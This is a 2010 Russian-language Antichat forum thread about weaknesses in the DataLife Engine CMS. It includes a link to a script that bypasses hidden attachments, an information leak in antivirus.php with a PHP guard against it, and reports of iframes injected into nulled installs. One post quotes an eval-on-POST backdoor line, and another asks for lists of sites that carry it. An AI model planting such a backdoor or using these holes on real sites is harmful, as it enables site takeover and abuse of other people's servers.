HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.03.2010, 22:31
Alex$09
Новичок
Регистрация: 01.10.2009
Сообщений: 27
С нами: 8742028

Репутация: -2
Lightbulb

Цитата:
Сообщение от botanig  
Как просмотреть, что под хайдом в DLE?
Так просто не посмотришь а смощию скрипта свободно можешь слить файлы не только дле но и другие движки...
http://new-dle.biz/exclusive/667-skript-obxoda-xajda-dlya-attachej-v-dle.html
 
Ответить с цитированием

  #2  
Старый 27.03.2010, 01:34
sir95
Новичок
Регистрация: 30.11.2009
Сообщений: 9
С нами: 8656400

Репутация: 0
По умолчанию

В 8.3, может и раньшых!
вывод какие модули стоят.

Файл

http://localhost/engine/ajax/antivirus.php

Вывод список!

Защищаемся
На начало добавить

PHP код:
if(!defined('DATALIFEENGINE'))
{
  die(
"You lol! Anatole yzhe tut");


Последний раз редактировалось sir95; 27.03.2010 в 01:37..
 
Ответить с цитированием

  #3  
Старый 09.04.2010, 12:00
saransko_o
Новичок
Регистрация: 01.01.2009
Сообщений: 14
С нами: 9135178

Репутация: 2
По умолчанию

имеются сайты dle 8.0 ,8.2
Каким то образом в файлы dbconfig.php config.php init.php дописываются строки с фреймом типа echo bla bla bla.
Шеллов на хостинге нет, все оригинальное, пароли меняли, в общем всё делали. А как то дописывается..
Создатель файла- 48, а если создаем мы то создатель- 500.
Т.е. файлы изменяет скрипт?
Где копать?
 
Ответить с цитированием

  #4  
Старый 11.04.2010, 20:23
sir95
Новичок
Регистрация: 30.11.2009
Сообщений: 9
С нами: 8656400

Репутация: 0
По умолчанию

Цитата:
Сообщение от saransko_o  
имеются сайты dle 8.0 ,8.2
Каким то образом в файлы dbconfig.php config.php init.php дописываются строки с фреймом типа echo bla bla bla.
Шеллов на хостинге нет, все оригинальное, пароли меняли, в общем всё делали. А как то дописывается..
Создатель файла- 48, а если создаем мы то создатель- 500.
Т.е. файлы изменяет скрипт?
Где копать?
Нулл движок?
 
Ответить с цитированием

  #5  
Старый 11.04.2010, 23:56
saransko_o
Новичок
Регистрация: 01.01.2009
Сообщений: 14
С нами: 9135178

Репутация: 2
По умолчанию

Цитата:
Сообщение от sir95  
Нулл движок?
да. нулл от MID.
 
Ответить с цитированием

  #6  
Старый 12.04.2010, 05:59
ReckouNT
Новичок
Регистрация: 16.01.2009
Сообщений: 17
С нами: 9114129

Репутация: 2
По умолчанию

В нуллах авторы нулла пишут уязвимости. Либо сами нуллите, либо юзайте фривар двиг.
Сам лично юзаю PHP - Fusion.
 
Ответить с цитированием

  #7  
Старый 12.04.2010, 15:06
saransko_o
Новичок
Регистрация: 01.01.2009
Сообщений: 14
С нами: 9135178

Репутация: 2
По умолчанию

Кстати на многих лицензия была

Последний раз редактировалось saransko_o; 12.04.2010 в 15:11..
 
Ответить с цитированием

  #8  
Старый 26.04.2010, 09:17
Firrst
Новичок
Регистрация: 17.10.2009
Сообщений: 1
С нами: 8719681

Репутация: 0
По умолчанию

Никак, там в папке с загруженными файлами лежит htaccess, ты не выполнишь .php файл
 
Ответить с цитированием

  #9  
Старый 30.04.2010, 05:43
Rew
Новичок
Регистрация: 12.03.2010
Сообщений: 13
С нами: 8509548

Репутация: 0
По умолчанию

Есть бедкодер в папке /engine/ajax/

if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}

Что с этим можно сделать?

Последний раз редактировалось Rew; 30.04.2010 в 05:46..
 
Ответить с цитированием

  #10  
Старый 30.04.2010, 06:08
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Цитата:
Сообщение от Rew  
Есть бедкодер в папке /engine/ajax/

if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}

Что с этим можно сделать?
Ну например, отправить мне в ЛС список сайтов с этим бекдором
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...